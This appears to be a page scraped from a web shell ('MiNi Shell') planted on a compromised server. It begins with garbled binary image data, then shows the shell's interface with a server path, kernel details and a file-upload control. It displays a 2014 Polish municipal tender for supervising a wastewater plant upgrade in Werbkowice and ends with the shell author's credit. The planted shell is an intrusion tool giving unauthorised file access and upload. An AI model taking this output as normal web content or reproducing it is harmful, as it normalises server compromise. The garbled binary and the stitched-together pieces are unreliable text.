JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140407/117246-N-2014.html

<p class="kh_header"><b>Werbkowice: Nadzór inwestorski nad realizacją zadania pn:
Modernizacja biologicznej oczyszczalni ścieków w miejscowości Werbkowice wraz z odprowadzeniem ścieków oczyszczonych .</b><br>
<b>Numer ogłoszenia: 117246 - 2014; data zamieszczenia: 07.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Werbkowice reprezentowana przez Wójta Gminy , ul. Zamojska 1, 22-550 Werbkowice, woj. lubelskie, tel. 084 6572003 w. 33, faks 084 6572080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.werbkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad realizacją zadania pn:
Modernizacja biologicznej oczyszczalni ścieków w miejscowości Werbkowice wraz z odprowadzeniem ścieków oczyszczonych ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem  zamówienia  jest pełnienie wielobranżowego nadzoru inwestorskiego nad inwestycją  pn.Modernizacja biologicznej oczyszczalni ścieków w miejscowości Werbkowice wraz z odprowadzeniem  ścieków  oczyszczonych 
2) Przedmiot zamówienia objęty  jest   Projektem  współfinansowanym  z Europejskiego  Programu Rozwoju  Obszarów  Wiejskich na  lata 2007-2013 w ramach  działania :  Podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW .

3) Nadzorem inwestorskim objęte będą następujące roboty budowlane  polegające na:  Modernizacji biologiczno-mechanicznej oczyszczalni ścieków w m. Werbkowice o przepustowości Qdśr.=474,54m3 i RLM = 2933 i budowie bloku oczyszczania mechaniczno - biologicznego, komór tlenowej stabilizacji osadów i magazynu osadu odwodnionego będącego jednocześnie komorą stabilizacji tlenowej; modernizacji istniejących budynków oraz przepompowni; w okresie budowy i rozruchu nowej oczyszczalni ścieków: utrzymanie w całym zakresie procesu technologicznego, remont i ocieplenie konstrukcji budynku, demontaż skorodowanego pomostu i stropu podwieszonego we wschodniej połowie budynku, wykonanie prac niezbędnych dla nowej oczyszczalni we wschodniej części budynku;po uruchomieniu nowej oczyszczalni ścieków: demontaż niepotrzebnych urządzeń i likwidacja zbędnych obiektów.
Ilość i rodzaje zainstalowanych i planowanych maszyn i urządzeń
Pompownia - przewiduje się realizację nowej pompowni ścieków surowych wyposażonej w sito pionowe i w 3 pompy zatapialne wraz z pomiarem poziomów. 
Istniejący budynek 
Budynek ten będzie wymagał modernizacji w zakresie:
Naprawa pęknięć ścian ich ocieplenie oraz ocieplenie dachu.
Demontaż istniejącego i wykonanie nowego pomostu opartego na kolumnach jako konstrukcji niezależnej od istniejącej konstrukcji budynku.
Demontaż zbędnego wyposażenia technologicznego.
Wykonanie pomieszczeń zasilania energetycznego i sterowania.
Modernizacja istniejącego biegu schodów i wykonanie nowych umożliwiających wejście na nowo wykonany pomost.
Wykonanie instalacji ogrzewania elektrycznego i uzupełnienie instalacji wentylacyjnych.
Istniejący budynek podlegający modyfikacji
Zakłada się realizację części technologicznej wewnątrz istniejącego budynku technologicznego.
Układ funkcjonalny będzie zawierał:
pomieszczenie separatora skratek, tłuszczy i piasku - na pomoście,
pomieszczenie odwadniania osadu - na parterze,
pomieszczenie urządzeń elektrycznych, rozdzielnic i paneli,
pomieszczenie agregatu prądotwórczego - w obszarze powstałym w wyniku demontażu istniejących urządzeń,
pomieszczenie magazynowe (magazyn wapna chlorowanego i magazyn sprzętu).
Istniejąca, w budynku, wentylacja grawitacyjna i mechaniczna będzie ponownie zaprojektowana i odpowiednio dostosowana do obecnie obowiązujących wymagań w zakresie wentylacji, ogrzewania elektrycznego, oświetlenia, instalacji wod.-kan.
Separator skratek i piasku
Separator zlokalizowany w budynku na nowo wykonanym pomoście wewnątrz istniejącego budynku. Doprowadzone ścieki kierowane będą na sito bębnowe, gdzie następuje separacja ciał stałych, które są płukane, odsączane, zagęszczane i transportowane do pojemników.
Piasek gromadzi się w piaskowniku poziomym skąd transportowany jest do pojemników.
Przewidziano wyposażenie w układ napowietrzania i separujący tłuszcz. Po przejściu przez urządzenie ścieki są kierowane do dalszej obróbki. Cały proces wstępnego oczyszczania jest zamknięty i hermetyczny. W zależności od potrzeb urządzenie może być wyposażone w układ do automatycznego poboru próbek .
Na wlocie rurociągu tłocznego do separatora przewidziano zainstalowanie przepływomierza elektromagnetycznego sterującego pracą separatora.
Osadnik wstępny
Przewiduje się zastosowanie trójkomorowego osadnika wstępnego w formie prostokątnego zbiornika żelbetowego. Usuwanie osadu z osadników do komory stabilizacji tlenowej przewidziano grawitacyjnie z każdego osadnika oddzielnie.
Przerzut osadu do komory tlenowej stabilizacji będzie się odbywało poprzez ręczne (lub automatycznie z możliwością ręcznego otwierania) otwieranie kolejnych zasuw. Czas otwarcia zasuw na podstawie oceny eksploatacyjnej dokonywanej przez obsługę.
Zbiornik wyrównawczy
Zbiornik wyrównawczy pozwoli na uśrednienie dopływu ścieków do bioreaktorów, które powinny być zasilane równomiernie w sposób ciągły.
Przewiduje się zastosowanie zbiornika w konstrukcji żelbetowej.
Zbiornik wyposażony w dwa przelewy: pływający zlokalizowany wewnątrz rury wymuszającej pobór ścieków z dna zbiornika oraz przelewu stałego na poziomie maksymalnego poziomu zwierciadła ścieków.
Bioreaktor
Przewiduje się zastosowanie trzystopniowego reaktora biologicznego tlenowego oczyszczania ścieków na złożach biologicznych zanurzonych.
Obudowa bioreaktora z konstrukcji żelbetowej - trzy komory z czterema złożami w dwóch ciągach o wymiarach w rzucie 5,10 x 4,80 każda i głębokości całkowitej 3,50 m.
Odpływ ścieków oczyszczonych przewidziano z trzeciej komory bioreaktora poprzez rurociąg PE DN250.
Komora Tlenowej Stabilizacji Osadu (KTS).
Zakłada się budowę 2 szt. KTS każda o pojemności ok. 44,0 m3.
Pomiar objętości przepływu
Odpływ z oczyszczalni odprowadzany będzie rurociągiem ciśnieniowym o średnicy DN 250. Na odpływie z oczyszczalni należy wykonać studzienkę pomiarową z zainstalowanym przepływomierzem. Należy zastosować przepływomierz elektromagnetyczny na terenie oczyszczalni ścieków. Odpływ będzie następował rurociągiem ciśnieniowym, który przed odpływem do rzeki przejdzie w przewód grawitacyjny z wylotem na skarpie koryta rzeki.
Odprowadzenie ścieków oczyszczonych 
Budowa kanału sanitarnego z rur PR o średnicy DN 300 i długości ok. 259,2 m.
Szczegółowy   zakres  objęty  zamówieniem  określa  projekt  budowlany  w wersji  elektronicznej : www.werbkowice.pl/ bip  zamówienia  publiczne / pod  ogłoszeniem  o zamówieniu - Budowa  biologicznej  oczyszczalni ścieków .
 
5. Szczegółowy opis  przedmiotu zamówienia.
Do obowiązków  inspektora nadzoru należy pełny  zakres czynności  określony w przepisach  ustawy z dnia 7 lipca 1994 roku Prawo budowlane  ( t.j Dz. U z 2010 r. , Nr 243 , poz. 1623 z póż. Zmian. ) 
Wykonawca w  ramach wykonywania przedmiotu zamówienia zobowiązany jest w  szczególności  do :
1)sprawowania nadzoru inwestorskiego z należytą  starannością ;
2)nadzorowania przebiegu realizacji projektu  inwestycyjnego wraz z podejmowaniem działań   dyscyplinująco - koordynujących celem zapewnienia najwyższej jakości wykonywanych robót  i dotrzymania zgodności postępu robót  zgodnie z przyjętym  harmonogramem. 
3)reprezentowania interesów Zamawiającego na budowie  przez sprawowanie kontroli zgodności jej realizacji  z umową o  roboty  budowlane , obowiązującymi przepisami  , sztuka  budowlaną i zasadami wiedzy technicznej .
4)posiadania , przez okres obowiązywania umowy , ubezpieczenia od odpowiedzialności  cywilnej z tytułu świadczenia usług nadzoru  inwestorskiego .
5) uczestniczenia w przekazaniu placu  budowy Wykonawcy  robót .
6) sprawdzania jakości robót i wbudowanych materiałów , by zapobiec zastosowaniu materiałów wadliwych i nie dopuszczonych do stosowania w budownictwie , a w szczególności  obowiązkowy odbiór przedstawionych przez Wykonawce robót budowlanych  certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem .
7) sprawdzenie i odbiór robót budowlanych  ulegających zakryciu  lub zanikających .
8)nadzorowanie budowy w  takich odstępach czasu , aby była zapewniona skuteczność nadzoru .
9)udział w niezbędnych  próbach , badaniach , pomiarach  lub sprawdzeniach  instalacji lub urządzeń technicznych .
10)udział w  rozruchu technologicznym urządzeń i obiektów oraz analiza osiągniętych  przez nie parametrów , w tym  osiągnięcia  planowanego efektu technologicznego oczyszczalni .
11)organizowanie i koordynowanie  czynności odbioru  etapów  robót , zgodnie z harmonogramem rzeczowo- finansowym  oraz całego  zadania jak również  przekazania  obiektu  do  użytku .
12)bieżące informowanie  Zamawiającego  o wystąpieniu wad lub usterek i egzekwowania ich usunięcia  przez  Wykonawce  robót .
13) kontroli  nadzorowanych robót w  zakresie przestrzegania przepisów  i zasad bezpieczeństwa pracy .
14)kontroli prawidłowości zafakturowania wykonanych robót , potwierdzenia faktycznej ilości robót i usunięcia wad , a także kontrolowania rozliczeń  budowy .
15)wydawanie kierownikowi budowy  ewentualnych poleceń dotyczących realizacji zadania .
16)wstrzymywanie robót budowlanych w przypadku , gdyby ich  kontynuacja mogła wywołać zagrożenie bądź spowodować  niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę .
17)dokonywanie wpisów w dziennik budowy  stwierdzających  istotne  okoliczności mające znaczenie dla oceny właściwego wykonania robót ,  w tym  potwierdzenie zapisów kierownika budowy o gotowości  robót do odbioru oraz potwierdzenie  prawidłowego wykonania prób , badań , sprawdzeń i rozruchów .
18)rozstrzygania w porozumieniu z kierownikiem budowy , wątpliwości natury technicznej , powstałych w w toku wykonywania robót .
19)kierowanie pracami Komisji , powoływanych do oceny lub rozstrzygnięcia technicznych  spraw budowy w toku jej realizacji .
20)w razie konieczności  wykonania robót zamiennych lub zamówień  dodatkowych , spisania wspólnie z kierownikiem budowy  protokołu  konieczność  wraz z uzasadnieniem  konieczności  wykonania tych  robót .
21)weryfikacja prawidłowości i kompletności dokumentów niezbędnych do  przeprowadzenia  poszczególnych odbiorów częściowych i odbioru  końcowego  oraz dokonywania oceny jakościowej robót  wraz z jej uzasadnieniem .
22) udział w procesie  uzyskiwania  pozwolenia na  użytkowanie  .
23) udział i  prowadzenie  przeglądów gwarancyjnych oraz  nadzór nad osunięciem wad , usterek i braków   stwierdzonych w  trakcie  okresu gwarancji i  rękojmi . 
Wykonawca zapewni realizację  przedmiotu zamówienia  w  zakresie  trzech specjalności  tj. 
- konstrukcyjno -  budowlanej ;
-instalacyjnej w  zakresie sieci , instalacji i urządzeń  wodociągowych i kanalizacyjnych ;
- instalacyjnej w  zakresie sieci , instalacji i urządzeń elektrycznych i  elektroenergetycznych .
Wykonawca  wyznaczy  koordynatora czynności   poszczególnych inspektorów  w osobie  posiadającej  uprawnienia  do kierowania  robotami budowlanymi bez  ograniczeń w  specjalności  sieci , instalacji i urządzeń  wodociągowych i kanalizacyjnych ;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium w niniejszym postępowaniu .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowych  wymagań w  zakresie spełnienia tego  warunku .  Wykonawca  potwierdza  spełnienie  warunku poprzez złożenie oświadczenia ( zał.  nr 2) .
Zamawiający dokona oceny spełnienia przez Wykonawcę warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia. Warunek graniczny -spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten  zostanie  spełniony , jeżeli Wykonawca wykaże , że w okresie ostatnich  trzech lat  przed upływem terminu  składania ofert , a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie , wykonał  co najmniej 1  usługę pełnienia nadzoru inwestorskiego nad budową , rozbudową lub  modernizacją oczyszczalni  ścieków   o  wartości robót  min. 3 mil.  zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowych  wymagań w  zakresie spełnienia tego  warunku .  Wykonawca  potwierdza  spełnienie  warunku poprzez złożenie oświadczenia ( zał.  nr 2) .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten  zostanie  spełniony , jeżeli Wykonawca wykaże w  załączonym  wykazie osób , które  będą uczestniczyć  w  wykonywaniu zamówienia , że  dysponuje  przynajmniej  po jednej osobie posiadającej uprawnienia do  kierowania robotami budowlanymi bez ograniczeń w specjalnościach :  
*konstrukcyjno - budowlanej - osoba ta musi posiadać minimum 5-letnie doświadczenie w pełnieniu samodzielnych funkcji  w budownictwie;
*instalacyjnej w  zakresie sieci , instalacji i urządzeń cieplnych , wentylacyjnych , gazowych , wodociągowych i kanalizacyjnych - osoba ta musi posiadać  minimum 5-letnie doświadczenie w pełnieniu samodzielnych  funkcji w budownictwie  oraz będzie  pełniła  funkcje  koordynatora czynności inspektorów  nadzoru .
*instalacyjnej w  zakresie sieci , instalacji i urządzeń  elektrycznych i elektroenergetycznych  .
 Wykonawca jednocześnie oświadczy , że osoby te  posiadają stosowne uprawnienia oraz przynależą do właściwej izby samorządu zawodowego .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  stawia szczegółowych wymagań w  zakresie spełnienia tego warunku . Wykonawca potwierdza spełnienie  warunku poprzez złożenie oświadczenia  ( zał. nr 2 )</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. listę podmiotów należących  do tej samej grupy kapitałowej , w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów ( Dz. U . Nr 50 , poz. 331 , z póż. Z,) albo informację o tym , że nie należy do grupy kapitałowej wg wzoru na zał.nr6.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.werbkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Werbkowice 
22-550 Werbkowice 
ul. Zamojska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 10:00, miejsce: Urząd  Gminy Werbkowice 
22-550 Werbkowice 
ul. Zamojska 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia objęty  jest   Projektem  współfinansowanym  z Europejskiego  Programu Rozwoju  Obszarów  Wiejskich na  lata 2007-2013 w ramach  działania :  Podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com